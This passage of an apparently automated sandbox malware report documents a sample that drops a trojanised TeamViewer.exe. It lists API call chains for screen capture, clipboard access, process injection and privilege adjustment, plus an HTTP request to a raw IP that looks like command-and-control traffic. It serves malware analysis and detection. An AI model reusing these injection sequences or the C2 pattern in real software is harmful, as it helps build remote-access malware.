Source: global traffic HTTP traffic detected: GET /din.aspx?s=12852408&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 37.252.232.109Connection: Keep-AliveCache-Control: no-cache
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.6:49758 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3366E0 GetDesktopWindow,GetDC,CreateCompatibleDC,RtlZeroMemory,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,RtlZeroMemory,GetCursorInfo,RtlZeroMemory,GetIconInfo,RtlZeroMemory,GetObjectA,DrawIconEx,SHCreateMemStream,RtlZeroMemory,VirtualAlloc,RtlZeroMemory,VirtualFree,DeleteObject,DeleteDC,ReleaseDC, 2_2_6F3366E0
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,SendMessageA,GlobalUnWire,SetClipboardData,CloseClipboard, 1_2_00405042
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33A130 CharLowerA,CreateEventA,GetLastError,CloseHandle,GetCurrentThreadId,GetThreadDesktop,CloseHandle,CreateDesktopA,CreateThread,WaitForSingleObject,CloseHandle,Sleep,CloseDesktop,CloseHandle, 2_2_6F33A130

System Summary:

barindex
Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040323C EntryPoint,7414E7F0,SetErrorMode,OleInitialize,SHGetFileInfo,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcat,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcat,lstrcmpi,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 1_2_0040323C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 2_2_6F335B40
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 3_2_6F335B40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 6_2_6F335B40
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00404853 1_2_00404853
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00406131 1_2_00406131
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053C2D6 3_2_0053C2D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004A13AA 3_2_004A13AA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053E430 3_2_0053E430
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004C97CD 3_2_004C97CD
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00534810 3_2_00534810
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_005438ED 3_2_005438ED
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004AC8A9 3_2_004AC8A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00544B6A 3_2_00544B6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004B9F5A 3_2_004B9F5A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00546FFB 3_2_00546FFB
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004A0FB2 3_2_004A0FB2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02723161 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272283C 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722424 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722004 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272460B 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02723161 12_3_02723161
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272283C 12_3_0272283C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722424 12_3_02722424
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02722004 12_3_02722004
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_0272460B 12_3_0272460B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F6828 12_3_026F6828
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F7104 12_3_026F7104
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F6000 12_3_026F6000
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040F6FE appears 64 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCB5 appears 478 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053E5C8 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0040DFA6 appears 37 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 004A1B0C appears 248 times
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: String function: 0053BCE8 appears 68 times
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333610 GetProcessHeap,CreateEnvironmentBlock,RtlZeroMemory,RtlZeroMemory,CreateProcessAsUserW,CreateProcessAsUserW,Sleep,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle, 2_2_6F333610
Contains functionality to call native functions
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00401000 NtdllDefWindowProc_A,BeginPaint,GetClientRect,DeleteObject,CreateBrushIndirect,FillRect,DeleteObject,CreateFontIndirectA,SetBkMode,SetTextColor,SelectObject,SelectObject,DrawTextA,SelectObject,DeleteObject,EndPaint, 1_2_00401000
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B1F0 NtSuspendThread,NtClose, 2_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33ADE0 NtProtectVirtualMemory, 2_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 2_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 2_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B270 NtResumeThread,NtClose,HeapFree, 2_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AD39 NtProtectVirtualMemory, 2_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33A500 NtQueryVirtualMemory, 2_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 2_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 2_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 2_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 2_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33AE20 NtOpenThread, 2_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 2_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 2_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle, 2_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 2_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 2_2_6F33B2D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 2_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3318D0 NtProtectVirtualMemory, 2_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AFC0 NtGetContextThread,NtSetContextThread, 3_2_6F33AFC0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33ADE0 NtProtectVirtualMemory, 3_2_6F33ADE0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW, 3_2_6F337790
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 3_2_6F338510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache, 3_2_6F338400
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B270 NtResumeThread,NtClose,HeapFree, 3_2_6F33B270
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B1F0 NtSuspendThread,NtClose, 3_2_6F33B1F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 3_2_6F33B0A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AE20 NtOpenThread, 3_2_6F33AE20
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,wsprintfA,CloseHandle,CloseHandle,CloseHandle, 3_2_6F334EF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 3_2_6F332ED0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33AD39 NtProtectVirtualMemory, 3_2_6F33AD39
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory, 3_2_6F331C00
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree, 3_2_6F3319F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3318D0 NtProtectVirtualMemory, 3_2_6F3318D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 3_2_6F332750
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332640 #404,RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,#404,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose, 3_2_6F332640
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33A500 NtQueryVirtualMemory, 3_2_6F33A500
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory, 3_2_6F3314E0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess, 3_2_6F3323B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache, 3_2_6F33B2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,wsprintfA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,C